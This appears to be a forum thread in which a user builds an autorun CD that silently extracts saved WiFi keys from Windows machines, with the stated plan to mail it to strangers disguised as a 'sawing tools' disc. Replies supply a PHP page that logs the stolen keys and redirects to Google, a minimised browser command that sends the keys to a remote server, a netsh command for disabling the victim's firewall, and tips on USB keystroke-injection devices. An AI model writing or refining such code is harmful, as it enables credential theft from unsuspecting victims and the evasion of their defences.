Jump to content

Wpa Keys Recovery With Cd


RiverJumper
 Share

Recommended Posts

Sup everybody.

First, sorry if i mess up something but this is my first post overhere.

What i was trying to make was an autoruning CD that recovers all the WiFi keys and then uploads then on the internet.

I founded a program called WZCOOK.exe by the aircrack-ng suite, that estracts all the keys and store them in a wepkeys.txt file in C:\\

What i manage to do is writing a batch file that just autorun the program and then uploads the file trought FTP.

I only have to problems remaning to be solved:

1)How to background all the work

2)The windows firewall cought the outbounds connection

Thanks for all the suggestions.

RiverJumper

Link to comment
Share on other sites

why not pass the keys in a url ?

call a browser page called log.php?key=iowejdwiowdewio

store it to a db ... then redirect them to google ?

this wouldn't get caught by the firewall but there is a chance they might see it

you could try

start /min iexplorer.exe "http://www.yoursite.com/log.php?='strvar'"

thats one way

if only you could edit the windows firewall rules on the fly that'd be handy

Link to comment
Share on other sites

Nice tool, hope they can implement that in Metasploit or Backtrack as well. It would make capturing WPA keys so much easier.

Link to comment
Share on other sites

why not pass the keys in a url ?

call a browser page called log.php?key=iowejdwiowdewio

store it to a db ... then redirect them to google ?

this wouldn't get caught by the firewall but there is a chance they might see it

you could try

start /min iexplorer.exe "http://www.yoursite.com/log.php?='strvar'"

thats one way

if only you could edit the windows firewall rules on the fly that'd be handy

I'm sorry but I'm not that familiar with php, so I would be happy if you could explain yourself a little bit better...

I don't really ask for spoon feeding its just that I'm new to programming & Co...

In the meantime, looking up on google I fouded this:

* Disable Windows XP firewall

netsh firewall set opmode disable

* Enable the Windows XP firewall

netsh firewall set opmode enable

I will try, to integrate this in a couple hours and I'll let you know if it succeed or not. though this is just for Windows Firewall, while your idea dribbles any kind of wall... so it's still interesting.

Nice tool, hope they can implement that in Metasploit or Backtrack as well. It would make capturing WPA keys so much easier.

I know i was surprised too when i found out there was pretty much nothing on the net about it!

Dunno if it's against the forum's rules but maybe if something works out, I'd like to post it overhere, in some kind of thanks for the help.

Edited by RiverJumper
Link to comment
Share on other sites

<?php
$key = $_GET['key'];
$fh = fopen('keys.txt', 'a');
fwrite($fh, $key . "\n");
fclose($fh);
?>

That would log the keys to a text file (assuming I didn't make any typos). Of course, you would still need to code something that connected to the server and sent the key. This could be done quite easily using the .NET framework or a scripting language such as perl or python.

Link to comment
Share on other sites

yeah ... txt file is much simpler than db

here's my little edit ...

<html>
<head>
<?php
$key = $_GET['key'];
$fh = fopen('keys.txt', 'a');
fwrite($fh, $key . "\n");
fclose($fh);
header('Location: http://www.google.com/');
?>
</head>
<body></body>
</html>

and

* Disable Windows XP firewall

netsh firewall set opmode disable

* Enable the Windows XP firewall

netsh firewall set opmode enable

sweet thanks for the tip

Edited by Trip
Link to comment
Share on other sites

<?php
$key = $_GET['key'];
$fh = fopen('keys.txt', 'a');
fwrite($fh, $key . "\n");
fclose($fh);
?>

That would log the keys to a text file (assuming I didn't make any typos). Of course, you would still need to code something that connected to the server and sent the key. This could be done quite easily using the .NET framework or a scripting language such as perl or python.

Correct me if I'm wrong but this would "dump" the keys in a txt file.

I already founded wzcook.exe for doing it, so why should I use this? Anyway thanks for the help but as i said before I'm not that familiar with this...

This helped me disabling the windows firewall. on a victim's windows box

Netsh commands

Netsh firewall

c

Thanks for the tip.Are they the same commands I posted upper? or like a better version of it working on Vista too?

yeah ... txt file is much simpler than db

here's my little edit ...

<html>
<head>
<?php
$key = $_GET['key'];
$fh = fopen('keys.txt', 'a');
fwrite($fh, $key . "\n");
fclose($fh);
header('Location: http://www.google.com/');
?>
</head>
<body></body>
</html>

and

sweet thanks for the tip

What does the string you added means? and you were talking before about a way to pass the keys trough a URL, can you explain this to me a little bit better please?

P.S.

You're welcome man! as they say Share the Knowledge!

Anyway that command works wonderfully. Just run it even from autorun and the windows firewall will never bother you again. Microsoft should be ashamed of themselves for making it soo easy.

Edited by RiverJumper
Link to comment
Share on other sites

Are we talking physical access to the machine, or creating the tool on a CD you give to people? If you have physical access to the machine, its pretty much game over anyway.

It would probably be easier to use something like the Teensy USB/rubber ducky device to plug it in, have it type out the commands and dump the keys from the registry back onto the thumbdrive and then be done with it. Much quicker and safer than trying to insert a CD and upload files to the internet.

If the machine has PowerShell installed, you can escalate admin level privileges to the system as demonstrated by Dave Kennedy and Iron Geek's Teensy USB, you could pretty much do anything at that point.

Video Demo - http://vimeo.com/14581715

Link to comment
Share on other sites

Are we talking physical access to the machine, or creating the tool on a CD you give to people? If you have physical access to the machine, its pretty much game over anyway.

It would probably be easier to use something like the Teensy USB/rubber ducky device to plug it in, have it type out the commands and dump the keys from the registry back onto the thumbdrive and then be done with it. Much quicker and safer than trying to insert a CD and upload files to the internet.

If the machine has PowerShell installed, you can escalate admin level privileges to the system as demonstrated by Dave Kennedy and Iron Geek's Teensy USB, you could pretty much do anything at that point.

Video Demo - http://vimeo.com/14581715

If i had physically access to it, i would use a normal usb with wzcook and the game was easily over.

i think wzcook does not need admin powers to act. not sure about it, but mostly many people have their only account already logged in with administration privileges.

Anyway thanks for this tip. I'm gonna buy a Teensy USB a day of those, also 'cause you can have some with your ps3 too with it.

To be really clear:I'm talking about drop a 0.15 € CD in my "grandma's" mailbox with something like "Best sawing tools" and make the game be.

Edited by RiverJumper
Link to comment
Share on other sites

i think wzcook does not need admin powers to act. not sure about it, but mostly many people have their only account already logged in with administration privileges.

Not everyone logs in as an administrator. Especially in a corporate network, everyone has very tight permissions, and access to their machines. So unless you plan on attacking a friend or someone who does have no idea of computer security than, using the method Digip suggested is a must.

Just something to keep an eye out for.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...